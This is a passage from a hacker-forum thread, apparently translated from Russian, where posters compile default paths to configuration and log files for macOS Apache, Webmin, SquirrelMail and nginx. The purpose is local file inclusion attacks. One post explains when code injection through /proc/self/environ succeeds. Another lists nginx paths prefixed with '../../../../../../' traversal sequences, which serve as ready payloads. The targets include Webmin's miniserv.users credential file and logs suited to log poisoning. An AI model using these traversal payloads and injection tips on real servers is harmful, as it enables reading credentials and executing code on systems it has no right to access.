    httpd conf
    /etc/osxhttpd/osxhttpd.conf
    /System/Library/WebObjects/Adaptors/Apache2.2/apache.conf

    osx site conf
    /etc/apache2/sites/*.conf
    /etc/httpd/sites/000[1...]_[IP]_[PORT]_[SITE_NAME].conf

    Example: 0002_18.80.2.252_80_meche.mit.edu.conf

    default site dir
    /Library/WebServer/Documents/

    Webmin

    conf
    /usr/local/etc/webmin/miniserv.conf
    /etc/webmin/miniserv.conf
    /usr/local/etc/webmin/miniserv.users
    /etc/webmin/miniserv.users

    log
    /var/log/webmin/miniserv.log
     
  16. ettee

    ettee Administrator
    Staff Member

    SquirrelMail


    *log
    /usr/share/squirrelmail/plugins/squirrel_logger/setup.php
    $sl_logfile = "/var/log/squirrelmail.log";

    /var/log/apache2/squirrelmail.log
    /var/log/apache2/squirrelmail.err.log
    /var/lib/squirrelmail/prefs/squirrelmail.log
    /var/log/squirrelmail.log
    /var/log/mail.log

    ls:
    #ls /usr/local/squirrelmail/www/
    Code:
    AUTHORS    configure  doc        include    plugins      src
    ChangeLog  contrib    functions  index.php  po            themes
    class      COPYING    help      INSTALL    README        UPGRADE
    config    data      images    locale    ReleaseNotes
    # ls /var/local/squirrelmail/
    Code:
    attach  data
    # ls /etc/squirrelmail/
    Code:
    apache.conf        config_local.php  default_pref      index.php
    config_default.php  config.php        filters_setup.php  sqspell_config.php
    *conf
    /etc/squirrelmail/config/config.php
    /etc/squirrelmail/config.php
    /etc/httpd/conf.d/squirrelmail.conf
    /usr/share/squirrelmail/config/config.php
    /private/etc/squirrelmail/config/config.php
    /srv/www/htdos/squirrelmail/config/config.php
    /var/www/squirrelmail/config/config.php
    /var/www/html/squirrelmail/config/config.php
    /var/www/html/squirrelmail[Version]/config/config.php (/var/www/html/squirrelmail-1.2.9/config/config.php)

    Plugin
    /etc/squirrelmail/plugins
    /usr/share/squirrelmail/plugins

    /usr/share/squirrelmail/config/config.php
    $plugins[1] = 'squirrel_logger';
    $plugins[2]
    ...
     
    _________________________
  17. winterfrost

    winterfrost Elder

    Joined:
    18 Aug 2008
    Messages:
    42
    Likes Received:
    18
    Reputations:
    15
    As far as I understand, executing code via /proc/self/environ will only work if PHP runs as CGI; otherwise /proc/self/environ will point to Apache's environment. It is easy to check: if /proc/self/cmdline contains something like
    Code:
    /usr/sbin/apache2\0-k\0start\0
    then PHP is not CGI and injecting code into /proc/self/environ will not work.
     
  18. Kakoytoxaker

    Kakoytoxaker Elder

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    A small addition to the material provided by c411k

    1 This will not work on FreeBSD. Things are set up a bit differently there, and proc/ is not used by default.

    2 Searching for logs via PIDs is pointless, and unnecessary too; the thing is that
    proc/self/
    is precisely a link to the directory with the process's data, and
    proc/self/fd
    in turn is the directory containing links to the files the process uses. So it is all simpler.

    =============================

    Also, regarding default logs, I'll add from my own observations

    On Apache 2.2.x you quite often come across directories
    apache22/ i.e.
    etc.
     
  19. [х26]VОLАND

    [х26]VОLАND Elder

    Joined:
    7 Jun 2006
    Messages:
    513
    Likes Received:
    756
    Reputations:
    218
    nginx

    *.conf:
    Code:
    ../../../../../../etc/nginx/srv.d/*.conf
    ../../../../../../etc/nginx/nginx.conf
    ../../../../../../usr/local/etc/nginx/nginx.conf
    ../../../../../../usr/local/nginx/conf/nginx.conf
    logs:
    Code:
    ../../../../../../var/log/nginx/access_log
    ../../../../../../var/log/nginx/error_log
    ../../../../../../var/log/nginx/access.log
    ../../../../../../var/log/nginx/error.log
    ../../../../../../var/log/nginx.access_log
    ../../../../../../var/log/nginx.error_log
    
    ../../../../../../logs/access_log
    ../../../../../../logs/error_log
    ../../../../../../logs/access.log
    ../../../../../../logs/error.log
    
    ../../../../../../var/www/<domain.com>/log/nginx.access.log
    ../../../../../../var/www/<domain.com>/log/nginx.error.log
    ../../../../../../var/www/<domain.com>/log/nginx.access_log
    ../../../../../../var/www/<domain.com>/log/nginx.error_log
    
    ../../../../../../var/log/nginx/<domain.com>.access.log
    ../../../../../../var/log/nginx/<domain.com>.error.log
    ../../../../../../var/log/nginx/<domain.com>_access.log
    ../../../../../../var/log/nginx/<domain.com>_error.log
     
  20. ShAnKaR

    ShAnKaR Pack of margarine

    no need to clean up like that, it's unverified copy-paste )